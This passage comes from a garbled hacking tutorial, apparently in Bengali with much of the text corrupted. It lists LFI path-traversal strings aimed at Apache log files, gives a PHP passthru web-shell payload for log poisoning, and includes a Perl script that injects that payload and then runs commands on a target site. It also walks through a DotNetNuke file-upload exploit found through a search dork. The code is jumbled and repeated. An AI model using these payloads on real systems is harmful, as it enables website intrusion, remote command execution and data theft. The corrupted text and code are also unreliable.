,�" ���*���NA� �� +" �� ���� ������ �� crack ���� ��।��¡ ,�" password �� +" �� ���� ��.�� �� �� /etc/shadow file � ������� ��' /�� ���� �� +" �� �����।���� ���� +� �- injection Ø��� +" �� ��।
�-£��� �����z� ���$% distribution � ���$% )��-�� ����।���& ��#��� ��'� Directory �� ��� +"�� � +, ��� ��#��P� �- ����।
../apache/logs/error.log
../apache/logs/access.log
../../apache/logs/error.log
../../apache/logs/access.log
../../../apache/logs/error.log
../../../apache/logs/access.log
../../../../../../../etc/httpd/logs/acces_log
../../../../../../../etc/httpd/logs/acces.log
../../../../../../../etc/httpd/logs/error_log
../../../../../../../etc/httpd/logs/error.log
../../../../../../../var/www/logs/access_log
![Page 107: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/107.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
107
../../../../../../../var/www/logs/access.log
../../../../../../../usr/local/apache/logs/access_log
../../../../../../../usr/local/apache/logs/access.log
../../../../../../../var/log/apache/access_log
../../../../../../../var/log/apache2/access_log
../../../../../../../var/log/apache/access.log
../../../../../../../var/log/apache2/access.log
../../../../../../../var/log/access_log
../../../../../../../var/log/access.log
../../../../../../../var/www/logs/error_log
../../../../../../../var/www/logs/error.log
../../../../../../../usr/local/apache/logs/error_log
../../../../../../../usr/local/apache/logs/error.log
../../../../../../../var/log/apache/error_log
../../../../../../../var/log/apache2/error_log
../../../../../../../var/log/apache2/error.log
../../../../../../../var/log/error_log
../../../../../../../var/log/error.log
![Page 108: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/108.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
108
���& �- injection ���� ��'� #�� +"*�� �।
t. (��� ������ ���-A�*��������� ������� ������� $��A� +�� ��� ��,,� �- /���� ��*�� ,���।
O.���� LFI �� ��#�� ���� *� /����� +������� ,��� +� ��� ,�" ��'� �- ��*�� ,�� ���� ���� #��� ,���।
w.���� +� ��'� PHP +��N �- /���� inject ���� ��। URL � = �&Õ� ���
<? Passthru($_GET[‘cmd’]) ?> +��N�� Inject ���� ��। ��� ���� Shell access ���� ����� ��� ������ ���� ��� ����� �����।������ URL � ��� ����� php ��� �- ��।
4.,�" ���� *� �s��A� �- /���� ,�� ���� PHP +��N�� ��� +" ���
%3C?%20passthru($_GET[cmd])%20?%3E
5.���� PHP +��N�� � ��� ��$��A �� +-�'।��� ���� ¯�*)���� �/&��।¯�*)�� PHP ����� +� �����N ��� +/���'।� ��� ���� ���A ��� ���� ��� �� ���� ���#�� ��� ,��।���Î +��N�� +"*�� �।���N���� $site, $path, $code, ��� $log (���)� �� ��N� ��� ���� ��। #!/usr/bin/perl #!/usr/bin/perl #!/usr/bin/perl #!/usr/bin/perl ----w w w w use IO::Socket; use IO::Socket; use IO::Socket; use IO::Socket; use LWP::UserAgent; use LWP::UserAgent; use LWP::UserAgent; use LWP::UserAgent; $site=”www.vulnerablesite.com”; $site=”www.vulnerablesite.com”; $site=”www.vulnerablesite.com”; $site=”www.vulnerablesite.com”; $path=”/”; $path=”/”; $path=”/”; $path=”/”; $code=”<? Passthru($code=”<? Passthru($code=”<? Passthru($code=”<? Passthru(\\\\$_GET[cmd]) ?>”; $_GET[cmd]) ?>”; $_GET[cmd]) ?>”; $_GET[cmd]) ?>”; $log = “../../../../../../../etc/httpd/logs/error_log”; $log = “../../../../../../../etc/httpd/logs/error_log”; $log = “../../../../../../../etc/httpd/logs/error_log”; $log = “../../../../../../../etc/httpd/logs/error_log”; print “Trying to inject the code”; print “Trying to inject the code”; print “Trying to inject the code”; print “Trying to inject the code”;
![Page 109: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/109.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
109
$socket = IO::Socket::$socket = IO::Socket::$socket = IO::Socket::$socket = IO::Socket::INETINETINETINET---->new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die >new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die >new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die >new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die ““““\\\\nConnection Failed.nConnection Failed.nConnection Failed.nConnection Failed.\\\\nnnn\\\\n”; n”; n”; n”; print $socket “GET “.$path.$code.” HTTP/1.1print $socket “GET “.$path.$code.” HTTP/1.1print $socket “GET “.$path.$code.” HTTP/1.1print $socket “GET “.$path.$code.” HTTP/1.1\\\\rrrr\\\\n”; n”; n”; n”; print $socket “Userprint $socket “Userprint $socket “Userprint $socket “User----Agent: “.$code.”Agent: “.$code.”Agent: “.$code.”Agent: “.$code.”\\\\rrrr\\\\n”; n”; n”; n”; print $socket “Host: “.$site.”print $socket “Host: “.$site.”print $socket “Host: “.$site.”print $socket “Host: “.$site.”\\\\rrrr\\\\n”; n”; n”; n”; print $socket “Connection: closeprint $socket “Connection: closeprint $socket “Connection: closeprint $socket “Connection: close\\\\rrrr\\\\nnnn\\\\rrrr\\\\n”; n”; n”; n”; close($socket); close($socket); close($socket); close($socket); print “print “print “print “\\\\nCode $code successfully injected in $log nCode $code successfully injected in $log nCode $code successfully injected in $log nCode $code successfully injected in $log \\\\n”; n”; n”; n”; print “print “print “print “\\\\nType command to run or exit to end: “; nType command to run or exit to end: “; nType command to run or exit to end: “; nType command to run or exit to end: “; $cmd = <STDIN>; $cmd = <STDIN>; $cmd = <STDIN>; $cmd = <STDIN>; while($cmd !~ “exit”) { while($cmd !~ “exit”) { while($cmd !~ “exit”) { while($cmd !~ “exit”) { $socket = IO::Socket::INET$socket = IO::Socket::INET$socket = IO::Socket::INET$socket = IO::Socket::INET---->new(Proto=>”tcp”, Pe>new(Proto=>”tcp”, Pe>new(Proto=>”tcp”, Pe>new(Proto=>”tcp”, PeerAddr=>”$site”, PeerPort=>”80”) or die erAddr=>”$site”, PeerPort=>”80”) or die erAddr=>”$site”, PeerPort=>”80”) or die erAddr=>”$site”, PeerPort=>”80”) or die ““““\\\\nConnection Failed.nConnection Failed.nConnection Failed.nConnection Failed.\\\\nnnn\\\\n”; n”; n”; n”; print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$cmd HTTP/1.1print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$cmd HTTP/1.1print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$cmd HTTP/1.1print $socket “GET “.$path.”index.php?filename=”.$log.”&cmd=$cmd HTTP/1.1\\\\rrrr\\\\n”; n”; n”; n”; print $socket “Host: “.$site.”print $socket “Host: “.$site.”print $socket “Host: “.$site.”print $socket “Host: “.$site.”\\\\rrrr\\\\n”; n”; n”; n”; print $socket “Accept: */*print $socket “Accept: */*print $socket “Accept: */*print $socket “Accept: */*\\\\rrrr\\\\n”; n”; n”; n”; print $socket “Connection: closeprint $socket “Connection: closeprint $socket “Connection: closeprint $socket “Connection: close\\\\rrrr\\\\nnnn\\\\n”; n”; n”; n”; while ($show = <$socket>) while ($show = <$socket>) while ($show = <$socket>) while ($show = <$socket>) {{{{ print $show; print $show; print $show; print $show; }}}} print “Type command to run or exit to end: “;print “Type command to run or exit to end: “;print “Type command to run or exit to end: “;print “Type command to run or exit to end: “; $cmd = <STDIN>; $cmd = <STDIN>; $cmd = <STDIN>; $cmd = <STDIN>; }}}}
�.���� �� ��� ��G� $��� ����� ����� ��$A��� +,������ ���� ���� ����� ��� +����� �z���� ��� R00T access ���� �����।
![Page 110: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/110.jpg)
DNN �� /� � ����� "�^�� Dotnetnuke=< (��� +������ ���� *������� ��) +�� ���� �� +,��
£-� N�A �"��� Vulnerable ���� ��) +�� ���� �����N�A�� ����
inurl:"/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"
£-�� ��� ��� ��&A �"�� ��� ���� +��' ��*।
��&A +�)�¤ +��� +��� ���� �� ���ç ��� ������ +��� *� *������� vulnerable
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
��* ��'� *��� ����
DNN ����
Dotnetnuke ,� ASP +��N ���� CMS। (��� +������ ���� *������� ��) +�� ���� �� +,�� Vulnerable।
���� ��) +�� ���� �����।
inurl:"/Providers/HtmlEditorProviders/Fck/fcklinkgallery.aspx"
£-�� ��� ��� ��&A �"�� ��� Vulnerable *������� +��� ,��� ��� +���
��&A +�)�¤ +��� +��� ���� �� ���ç ��� ���� ���� ���� +�) ����lnerable ��।
www.facebook.com/p1n1x.cr3w
110
। ���� ���
*������� +��� ,��� ��� +��� +,����
���� ���� +�) ����।���� +�)
![Page 111: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/111.jpg)
� File (A File On Your Site
� javascript:__doPostBack('ctlURL$cmdUpload','')
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
File (A File On Your Site) �� � +��N* ����� ��� ���� ।
javascript:__doPostBack('ctlURL$cmdUpload','')
www.facebook.com/p1n1x.cr3w
111
![Page 112: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/112.jpg)
Script �� ¯�!)���� ��Ï����� ��� ����
� Script ��� ����� /���
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
�� ¯�!)���� ��Ï����� ��� ����।
��� ����� /��� Upload ���� )� �&��� �� Browse ������ ����
www.facebook.com/p1n1x.cr3w
112
������ ����।
![Page 113: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/113.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
113
� � ��� Browse ��� Jpg,Gif,swf����" /��� Upload ���� �����।� ��� ,�� Upload ���� �� ��#��� $��� /portals/0/portals/0/portals/0/portals/0/ +� Upload ��। ,�" +����� ������ ��� � target.nettarget.nettarget.nettarget.net ��� +����� Upload ��� /��� �� ��� ,�" � test.swftest.swftest.swftest.swf ���� +����� /��� ���� http://www.Target.net/portals/0/test.swf +�।���)� ���� ���� ò��(swf) Animation ������ Upload ��� "�*,���।� �� +��� http://www.mediafire.com/?mntuomzigmy �/�*����� N�!����N ��� ���� �����।
![Page 114: Fussilatbd Educational Website · 2020. 3. 23. · Fussilatbd Educational Website](https://reader033.vdocument.in/reader033/viewer/2022053111/6082c3eaba85ea6e17264f62/html5/thumbnails/114.jpg)
P1n1x_Cr3w | www.facebook.com/p1n1x.cr3w
114
����Á
�� ������ +, ��� ��E� ���� ����&�� ��� ���' ��� ���Á ��"s� (���B।� ��� ��E�� ��* )���� £-� ���� ����।"F ���� �� �� ���� �r ����� ��।�(�x���� ��î���) $���� $��� �� �� ��।����E ��� ��/��++,����&��,���A,�����
����" ��î���) £��� ���� �^������ ��� �& �-$���� ���� �� �A�² -��EP� &����� ��।��F�� (������� +��� ���® +��।!��� !�÷� � ��î���) £���� ���� ��&������,������,)�$���� ����" ��î���) £��� �� �� $���� *���-+N�$����*
�� �����। � ��� +"��� �� ������"��* ����$(Non-lazy) *���-+N�$������ ��� (���)�।